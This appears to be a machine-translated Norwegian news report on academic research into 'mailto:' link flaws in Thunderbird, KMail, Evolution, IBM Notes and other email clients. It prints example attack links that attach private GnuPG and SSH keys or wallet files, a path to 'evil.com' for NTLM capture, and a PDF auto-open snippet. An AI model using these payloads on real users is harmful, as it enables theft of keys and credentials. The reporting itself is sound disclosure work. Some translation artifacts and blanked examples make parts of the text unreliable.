Forskere fra Ruhr University Bochum (Tyskland) () oppførsel av e-postklienter ved behandling av "mailto:"-koblinger med avanserte parametere. Fem av de tjue e-postklientene som ble undersøkt, var sårbare for et angrep som manipulerte ressurserstatning ved å bruke «vedlegg»-parameteren. Ytterligere seks e-postklienter var sårbare for et PGP- og S/MIME-nøkkelangrep, og tre klienter var sårbare for et angrep for å trekke ut innholdet i krypterte meldinger.
Linker «"brukes til å automatisere åpningen av en e-postklient for å skrive et brev til adressaten spesifisert i lenken. I tillegg til adressen kan du spesifisere ytterligere parametere som en del av lenken, for eksempel emnet for brevet og en mal for typisk innhold. Det foreslåtte angrepet manipulerer «vedlegg»-parameteren, som lar deg legge ved et vedlegg til den genererte meldingen.
E-postklienter Thunderbird, GNOME Evolution (CVE-2020-11879), KDE KMail (CVE-2020-11880), IBM/HCL Notes (CVE-2020-4089) og Pegasus Mail var sårbare for et trivielt angrep som lar deg automatisk legge ved enhver lokal fil, spesifisert via en lenke som "mailto:?attach=path_to_file". Filen legges ved uten å vise en advarsel, så uten spesiell oppmerksomhet kan det hende at brukeren ikke legger merke til at brevet vil bli sendt med et vedlegg.
For eksempel ved å bruke en lenke som "mailto:[e-postbeskyttet]&subject=Title&body=Text&attach=~/.gnupg/secring.gpg" kan du sette inn private nøkler fra GnuPG i brevet. Du kan også sende innholdet i kryptolommebøker (~/.bitcoin/wallet.dat), SSH-nøkler (~/.ssh/id_rsa) og alle filer som er tilgjengelige for brukeren. Dessuten lar Thunderbird deg legge ved grupper av filer med maske ved å bruke konstruksjoner som "attach=/tmp/*.txt".
I tillegg til lokale filer, behandler noen e-postklienter koblinger til nettverkslagring og stier i IMAP-serveren. Spesielt lar IBM Notes deg overføre en fil fra en nettverkskatalog når du behandler lenker som "attach=\\evil.com\dummyfile", samt avskjære NTLM-autentiseringsparametere ved å sende en kobling til en SMB-server kontrollert av angriperen (forespørselen vil bli sendt med den gjeldende brukeren av autentiseringsparametere).
Thunderbird behandler forespørsler som "attach=imap:///fetch>UID>/INBOX>1/", som lar deg legge ved innhold fra mapper på IMAP-serveren. Samtidig blir meldinger hentet fra IMAP, kryptert via OpenPGP og S/MIME, automatisk dekryptert av e-postklienten før sending. Utviklerne av Thunderbird var om problemet i februar og i utgaven problemet er allerede løst (Thunderbird-grenene 52, 60 og 68 er fortsatt sårbare).
Gamle versjoner av Thunderbird var også sårbare for to andre angrepsvarianter på PGP og S/MIME foreslått av forskerne. Spesielt Thunderbird, samt OutLook, PostBox, eM Client, MailMate og R2Mail2, ble utsatt for et nøkkelerstatningsangrep, forårsaket av det faktum at e-postklienten automatisk importerer og installerer nye sertifikater sendt i S/MIME-meldinger, noe som tillater angriperen for å organisere erstatning av offentlige nøkler som allerede er lagret av brukeren.
Det andre angrepet, som Thunderbird, PostBox og MailMate er mottakelige for, manipulerer funksjonene til mekanismen for automatisk lagring av kladdmeldinger og tillater, ved hjelp av mailto-parametere, å starte dekryptering av krypterte meldinger eller tillegg av en digital signatur for vilkårlige meldinger, med påfølgende overføring av resultatet til angriperens IMAP-server. I dette angrepet overføres chifferteksten gjennom «body»-parameteren, og «meta refresh»-taggen brukes til å starte et anrop til angriperens IMAP-server. For eksempel: ' '
For å automatisk behandle "mailto:"-koblinger uten brukerinteraksjon, kan spesialdesignede PDF-dokumenter brukes - OpenAction-handlingen i PDF lar deg automatisk starte mailto-behandleren når du åpner et dokument:
%PDF-1.5
1 0 obj
<< /Type /Catalog /OpenAction [2 0 R] >>
endobj
2 0 obj
<< /Type /Action /S /URI/URI (mailto:?body=——BEGIN PGP-MELDING——[…])>>
endobj
Kilde: opennet.ru